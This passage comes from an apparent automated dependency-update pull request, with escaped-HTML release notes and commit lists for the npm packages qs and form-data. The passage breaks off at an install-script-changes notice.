well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e[Fix] fix regressions from robustness refactor\n[actions] update reusable workflows\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: avoid a crash when a \u003ccode\u003efilter\u003c/code\u003e key is \u003ccode\u003enull\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eutils.merge\u003c/code\u003e: functions should not be stringified into keys\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: avoid a crash with interpretNumericEntities: true, comma: true, and iso charset\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: ensure a non-string \u003ccode\u003efilter\u003c/code\u003e does not crash\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003e__proto__\u003c/code\u003e syntax instead of \u003ccode\u003eObject.create\u003c/code\u003e for null objects\u003c/li\u003e\n\u003cli\u003e[Refactor] misc cleanup\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/bdcf0c7f82387c18ac8fabfccd2f440645cef47b\"\u003e\u003ccode\u003ebdcf0c7\u003c/code\u003e\u003c/a\u003e v6.14.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/294db90c812ddbe7d7a35d5687c505fd21a2d6a2\"\u003e\u003ccode\u003e294db90\u003c/code\u003e\u003c/a\u003e [readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5c308e5516c270a78caa6f278465914090f91ec6\"\u003e\u003ccode\u003e5c308e5\u003c/code\u003e\u003c/a\u003e [readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/6addf8cf738d529c54d91f6f3ffb6c1be91bbfdc\"\u003e\u003ccode\u003e6addf8c\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/cfc108f662326d6ab540f3545ef0b832baf83cdf\"\u003e\u003ccode\u003ecfc108f\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/`pars...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/febb64442a80e49200211fa38d3c96b58024ac77\"\u003e\u003ccode\u003efebb644\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when `thr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\"\u003e\u003ccode\u003ef6a7abf\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/fbc5206c25b4d1851cea683f02c10756c521d15a\"\u003e\u003ccode\u003efbc5206\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1b9a8b4e78c6aff4c22fa559107227f02fd0216a\"\u003e\u003ccode\u003e1b9a8b4\u003c/code\u003e\u003c/a\u003e [actions] fix rebase workflow permissions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/2a35775614e0fb46ac8a3060201a32a7c23a7fda\"\u003e\u003ccode\u003e2a35775\u003c/code\u003e\u003c/a\u003e [meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.1...v6.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tags v2.5.3 and v3.0.3 \u003ca href=\"https://github.com/form-data/form-data/commit/92613b9208556eb4ebc482fdf599fae111626fb6\"\u003e\u003ccode\u003e92613b9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/806eda77740e6e3c67c7815afb216f2e1f187ba5\"\u003e\u003ccode\u003e806eda7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/8fdb3bc6b5d001f8909a9fca391d1d1d97ef1d79\"\u003e\u003ccode\u003e8fdb3bc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146\"\u003e\u003ccode\u003ed8d67dc\u003c/code\u003e\u003c/a\u003e v4.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e [meta] remove local commit hooks\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.0...v4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies 